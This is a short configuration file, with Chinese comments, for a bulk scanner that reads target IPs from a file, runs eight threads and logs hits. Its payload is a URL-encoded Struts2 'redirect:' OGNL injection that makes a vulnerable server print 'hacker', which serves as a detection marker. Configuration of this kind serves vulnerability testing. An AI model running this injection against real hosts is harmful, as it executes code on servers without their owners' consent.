[main]
# 扫描为真的规则（支持正则）
scan_rule = hacker
# 扫描后收集结果的规则（支持正则）
res_rule = hacker
# 扫描使用的payload
payload = redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}
# 使用raw方法，放置http报文的文件
raw_file = 
# 待扫描ip列表的文件
ip_file = c:\\ip.txt
#输出结果的文件
out_file = c:\\res.txt
# 开启的线程数
thread_num = 8
# 请求的方式
method = get